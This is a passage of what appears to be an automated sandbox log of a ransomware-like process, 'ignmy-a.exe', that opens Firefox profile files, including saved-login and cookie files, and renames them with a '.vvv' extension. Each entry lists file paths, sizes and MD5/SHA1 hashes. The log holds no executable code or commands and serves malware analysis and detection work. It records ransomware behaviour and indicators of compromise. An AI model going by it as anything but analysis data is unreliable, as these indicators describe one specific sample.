  12773.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12774.   dows\loader.js.vvv
  12775.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12776.  MD5:  79fa248ac67599d30631214fbb93cf99
  12777.  SHA1: f5057e306a2e5ccbe19b42e5b7a8d364bbf4ac54
  12778.     828     6014
  12779. File   
  12780. Open
  12781.    
  12782. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12783.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12784.   dows\observer.js
  12785.     828     3435
  12786. File   
  12787. Close
  12788.    
  12789. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12790.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12791.   dows\observer.js
  12792.  MD5:  8509d8647dd74e2b4cfe8cde62c1739c
  12793.  SHA1: 96c14d9644db24f38caae6cbb7189ea1dd63c438
  12794.     828     3854
  12795. File   
  12796. Rename
  12797.    
  12798. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12799.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12800.   dows\observer.js
  12801. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12802.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12803.   dows\observer.js.vvv
  12804.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12805.  MD5:  8509d8647dd74e2b4cfe8cde62c1739c
  12806.  SHA1: 96c14d9644db24f38caae6cbb7189ea1dd63c438
  12807.     828     3854
  12808. File   
  12809. Open
  12810.    
  12811. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12812.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12813.   dows\tabs.js
  12814.     828     7916
  12815. File   
  12816. Close
  12817.    
  12818. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12819.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12820.   dows\tabs.js
  12821.  MD5:  a4daca74cd7d76534fa19a01740bdabf
  12822.  SHA1: a5c82b6a7c44367c75c7a462bbce562c0fa7b100
  12823.     828     8334
  12824. File   
  12825. Rename
  12826.    
  12827. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12828.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12829.   dows\tabs.js
  12830. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12831.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\win
  12832.   dows\tabs.js.vvv
  12833.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12834.  MD5:  a4daca74cd7d76534fa19a01740bdabf
  12835.  SHA1: a5c82b6a7c44367c75c7a462bbce562c0fa7b100
  12836.     828     8334
  12837. File   
  12838. Open
  12839.    
  12840. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12841.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr
  12842.   .js
  12843.     828     6332
  12844. File   
  12845. Close
  12846.    
  12847. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12848.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr
  12849.   .js
  12850.  MD5:  d5e9b7e35b206756d8493ea4483c10aa
  12851.  SHA1: 667108f1a1e6d394be9a39c31b48812a524cd3d4
  12852.     828     6750
  12853. File   
  12854. Rename
  12855.    
  12856. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12857.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr
  12858.   .js
  12859. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12860.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr
  12861.   .js.vvv
  12862.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12863.  MD5:  d5e9b7e35b206756d8493ea4483c10aa
  12864.  SHA1: 667108f1a1e6d394be9a39c31b48812a524cd3d4
  12865.     828     6750
  12866. File   
  12867. Open
  12868.    
  12869. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12870.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpc
  12871.   om.js
  12872.     828     4999
  12873. File   
  12874. Close
  12875.    
  12876. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12877.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpc
  12878.   om.js
  12879.  MD5:  e246f99289d78ae90e84cc8984cf127d
  12880.  SHA1: d95b5df7ad88342f9cb2823ed2ee8ff164972931
  12881.     828     5422
  12882. File   
  12883. Rename
  12884.    
  12885. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12886.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpc
  12887.   om.js
  12888. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12889.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpc
  12890.   om.js.vvv
  12891.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12892.  MD5:  e246f99289d78ae90e84cc8984cf127d
  12893.  SHA1: d95b5df7ad88342f9cb2823ed2ee8ff164972931
  12894.     828     5422
  12895. File   
  12896. Open
  12897.    
  12898. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12899.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul
  12900.   -app.js
  12901.     828     3654
  12902. File   
  12903. Close
  12904.    
  12905. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12906.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul
  12907.   -app.js
  12908.  MD5:  470d82ddbf2bdf088c60a2cd56e796f4
  12909.  SHA1: 7a32c9b5f50396d2f34ff90e35ec0e2cf031a5b0
  12910.     828     4078
  12911. File   
  12912. Rename
  12913.    
  12914. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12915.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul
  12916.   -app.js
  12917. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12918.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul
  12919.   -app.js.vvv
  12920.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12921.  MD5:  470d82ddbf2bdf088c60a2cd56e796f4
  12922.  SHA1: 7a32c9b5f50396d2f34ff90e35ec0e2cf031a5b0
  12923.     828     4078
  12924. File   
  12925. Open
  12926.    
  12927. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12928.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js
  12929.     828     2014
  12930. File   
  12931. Close
  12932.    
  12933. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12934.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js
  12935.  MD5:  48bae592c5e1ce08666e4b0df39c0737
  12936.  SHA1: 6343dd627d798166ef6f6465ea8c770433e54173
  12937.     828     2430
  12938. File   
  12939. Rename
  12940.    
  12941. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12942.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js
  12943. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12944.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js.
  12945.   vvv
  12946.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12947.  MD5:  48bae592c5e1ce08666e4b0df39c0737
  12948.  SHA1: 6343dd627d798166ef6f6465ea8c770433e54173
  12949.     828     2430
  12950. File   
  12951. Open
  12952.    
  12953. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12954.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-m
  12955.   ain.js
  12956.     828     764
  12957. File   
  12958. Close
  12959.    
  12960. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12961.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-m
  12962.   ain.js
  12963.  MD5:  6c8c1a7412e6a31b778bd063faee6551
  12964.  SHA1: 5586131e3184add98031b6285cd5de88e6596e2f
  12965.     828     1182
  12966. File   
  12967. Rename
  12968.    
  12969. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12970.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-m
  12971.   ain.js
  12972. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12973.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-m
  12974.   ain.js.vvv
  12975.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  12976.  MD5:  6c8c1a7412e6a31b778bd063faee6551
  12977.  SHA1: 5586131e3184add98031b6285cd5de88e6596e2f
  12978.     828     1182
  12979. File   
  12980. Open
  12981.    
  12982. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12983.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
  12984.     828     605
  12985. File   
  12986. Close
  12987.    
  12988. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12989.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
  12990.  MD5:  2443a3762a580a1f9a36da81584ea7af
  12991.  SHA1: ce10a9db25be2ad049ebc063c00a09c85fc9ef4d
  12992.     828     1022
  12993. File   
  12994. Rename
  12995.    
  12996. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12997.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
  12998. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  12999.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js.vvv
  13000.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13001.  MD5:  2443a3762a580a1f9a36da81584ea7af
  13002.  SHA1: ce10a9db25be2ad049ebc063c00a09c85fc9ef4d
  13003.     828     1022
  13004. File   
  13005. Open
  13006.    
  13007. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13008.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
  13009.     828     3770
  13010. File   
  13011. Close
  13012.    
  13013. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13014.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
  13015.  MD5:  ac49eccbe0f9e6e47ea6df49e66d538d
  13016.  SHA1: cfa4d0dba17bcf8599e64bdac70a2786f6d17ec0
  13017.     828     4190
  13018. File   
  13019. Rename
  13020.    
  13021. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13022.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
  13023. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13024.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js.vvv
  13025.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13026.  MD5:  ac49eccbe0f9e6e47ea6df49e66d538d
  13027.  SHA1: cfa4d0dba17bcf8599e64bdac70a2786f6d17ec0
  13028.     828     4190
  13029. File   
  13030. Open
  13031.    
  13032. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13033.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
  13034.     828     1442
  13035. File   
  13036. Close
  13037.    
  13038. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13039.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
  13040.  MD5:  093473448a6634a6c639f0cf16c7cd64
  13041.  SHA1: 18c1ff213d7758c51fc0ada1c0c8f0ce1f9b84a9
  13042.     828     1870
  13043. File   
  13044. Rename
  13045.    
  13046. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13047.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
  13048. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13049.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt.vvv
  13050.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13051.  MD5:  093473448a6634a6c639f0cf16c7cd64
  13052.  SHA1: 18c1ff213d7758c51fc0ada1c0c8f0ce1f9b84a9
  13053.     828     1870
  13054. File   
  13055. Open
  13056.    
  13057. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13058.   prefs.js
  13059.     828     6344
  13060. File   
  13061. Close
  13062.    
  13063. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13064.   prefs.js
  13065.  MD5:  e404090c1363892b04bf48f0c47cffdf
  13066.  SHA1: 3461590ada143a7cff399651b9a3329687be96e5
  13067.     828     6766
  13068. File   
  13069. Rename
  13070.    
  13071. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13072.   prefs.js
  13073. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13074.   prefs.js.vvv
  13075.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13076.  MD5:  e404090c1363892b04bf48f0c47cffdf
  13077.  SHA1: 3461590ada143a7cff399651b9a3329687be96e5
  13078.     828     6766
  13079. File   
  13080. Open
  13081.    
  13082. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13083.   sessionstore.js
  13084.     828     110
  13085. File   
  13086. Close
  13087.    
  13088. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13089.   sessionstore.js
  13090.  MD5:  b2b932950eec24e3e1d66b17293fceec
  13091.  SHA1: 702ed1f5e7abbd325215282512963bb0bde27f0e
  13092.     828     526
  13093. File   
  13094. Rename
  13095.    
  13096. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13097.   sessionstore.js
  13098. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13099.   sessionstore.js.vvv
  13100.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13101.  MD5:  b2b932950eec24e3e1d66b17293fceec
  13102.  SHA1: 702ed1f5e7abbd325215282512963bb0bde27f0e
  13103.     828     526
  13104. File   
  13105. Open
  13106.    
  13107. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13108.   signons2.txt
  13109.     828     157
  13110. File   
  13111. Close
  13112.    
  13113. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13114.   signons2.txt
  13115.  MD5:  16f880df029212dc5b83869b7b89d07a
  13116.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13117.     828     574
  13118. File   
  13119. Rename
  13120.    
  13121. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13122.   signons2.txt
  13123. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13124.   signons2.txt.vvv
  13125.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13126.  MD5:  16f880df029212dc5b83869b7b89d07a
  13127.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13128.     828     574
  13129. File   
  13130. Open
  13131.    
  13132. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13133.   signons3.txt
  13134.     828     157
  13135. File   
  13136. Close
  13137.    
  13138. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13139.   signons3.txt
  13140.  MD5:  16f880df029212dc5b83869b7b89d07a
  13141.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13142.     828     574
  13143. File   
  13144. Rename
  13145.    
  13146. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13147.   signons3.txt
  13148. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  13149.   signons3.txt.vvv
  13150.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13151.  MD5:  16f880df029212dc5b83869b7b89d07a
  13152.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13153.     828     574
  13154. File   
  13155. Open
  13156.    
  13157. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13158.   chrome\userChrome-example.css
  13159.     828     959
  13160. File   
  13161. Close
  13162.    
  13163. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13164.   chrome\userChrome-example.css
  13165.  MD5:  341aae03c744a20377452e79d7c87667
  13166.  SHA1: c865e98865ad5231f3b8b5f2eb58bcaec584dfb1
  13167.     828     1374
  13168. File   
  13169. Rename
  13170.    
  13171. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13172.   chrome\userChrome-example.css
  13173. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13174.   chrome\userChrome-example.css.vvv
  13175.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13176.  MD5:  341aae03c744a20377452e79d7c87667
  13177.  SHA1: c865e98865ad5231f3b8b5f2eb58bcaec584dfb1
  13178.     828     1374
  13179. File   
  13180. Open
  13181.    
  13182. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13183.   chrome\userContent-example.css
  13184.     828     663
  13185. File   
  13186. Close
  13187.    
  13188. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13189.   chrome\userContent-example.css
  13190.  MD5:  4412dd836af158506651794457294c39
  13191.  SHA1: 7f8ed59567e6c93b8cf2758f957d11db2004dfca
  13192.     828     1086
  13193. File   
  13194. Rename
  13195.    
  13196. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13197.   chrome\userContent-example.css
  13198. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13199.   chrome\userContent-example.css.vvv
  13200.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13201.  MD5:  4412dd836af158506651794457294c39
  13202.  SHA1: 7f8ed59567e6c93b8cf2758f957d11db2004dfca
  13203.     828     1086
  13204. File   
  13205. Open
  13206.    
  13207. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13208.   cookies.txt
  13209.     828     157
  13210. File   
  13211. Close
  13212.    
  13213. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13214.   cookies.txt
  13215.  MD5:  16f880df029212dc5b83869b7b89d07a
  13216.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13217.     828     574
  13218. File   
  13219. Rename
  13220.    
  13221. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13222.   cookies.txt
  13223. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13224.   cookies.txt.vvv
  13225.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13226.  MD5:  16f880df029212dc5b83869b7b89d07a
  13227.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13228.     828     574
  13229. File   
  13230. Open
  13231.    
  13232. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13233.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
  13234.     828     605
  13235. File   
  13236. Close
  13237.    
  13238. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13239.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
  13240.  MD5:  2443a3762a580a1f9a36da81584ea7af
  13241.  SHA1: ce10a9db25be2ad049ebc063c00a09c85fc9ef4d
  13242.     828     1022
  13243. File   
  13244. Rename
  13245.    
  13246. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13247.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
  13248. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13249.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js.vvv
  13250.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13251.  MD5:  2443a3762a580a1f9a36da81584ea7af
  13252.  SHA1: ce10a9db25be2ad049ebc063c00a09c85fc9ef4d
  13253.     828     1022
  13254. File   
  13255. Open
  13256.    
  13257. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13258.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
  13259.     828     3770
  13260. File   
  13261. Close
  13262.    
  13263. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13264.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
  13265.  MD5:  ac49eccbe0f9e6e47ea6df49e66d538d
  13266.  SHA1: cfa4d0dba17bcf8599e64bdac70a2786f6d17ec0
  13267.     828     4190
  13268. File   
  13269. Rename
  13270.    
  13271. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13272.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
  13273. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13274.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js.vvv
  13275.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13276.  MD5:  ac49eccbe0f9e6e47ea6df49e66d538d
  13277.  SHA1: cfa4d0dba17bcf8599e64bdac70a2786f6d17ec0
  13278.     828     4190
  13279. File   
  13280. Open
  13281.    
  13282. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13283.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
  13284.     828     1442
  13285. File   
  13286. Close
  13287.    
  13288. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13289.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
  13290.  MD5:  093473448a6634a6c639f0cf16c7cd64
  13291.  SHA1: 18c1ff213d7758c51fc0ada1c0c8f0ce1f9b84a9
  13292.     828     1870
  13293. File   
  13294. Rename
  13295.    
  13296. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13297.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
  13298. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13299.   extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt.vvv
  13300.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13301.  MD5:  093473448a6634a6c639f0cf16c7cd64
  13302.  SHA1: 18c1ff213d7758c51fc0ada1c0c8f0ce1f9b84a9
  13303.     828     1870
  13304. File   
  13305. Open
  13306.    
  13307. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13308.   prefs.js
  13309.     828     3672
  13310. File   
  13311. Close
  13312.    
  13313. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13314.   prefs.js
  13315.  MD5:  5190d668ef412e2ab68d8f3fac8d5c42
  13316.  SHA1: f0c32ef5cfdeeb306dcaab1587590f8cb548ec42
  13317.     828     4094
  13318. File   
  13319. Rename
  13320.    
  13321. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13322.   prefs.js
  13323. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13324.   prefs.js.vvv
  13325.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13326.  MD5:  5190d668ef412e2ab68d8f3fac8d5c42
  13327.  SHA1: f0c32ef5cfdeeb306dcaab1587590f8cb548ec42
  13328.     828     4094
  13329. File   
  13330. Open
  13331.    
  13332. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13333.   signons2.txt
  13334.     828     157
  13335. File   
  13336. Close
  13337.    
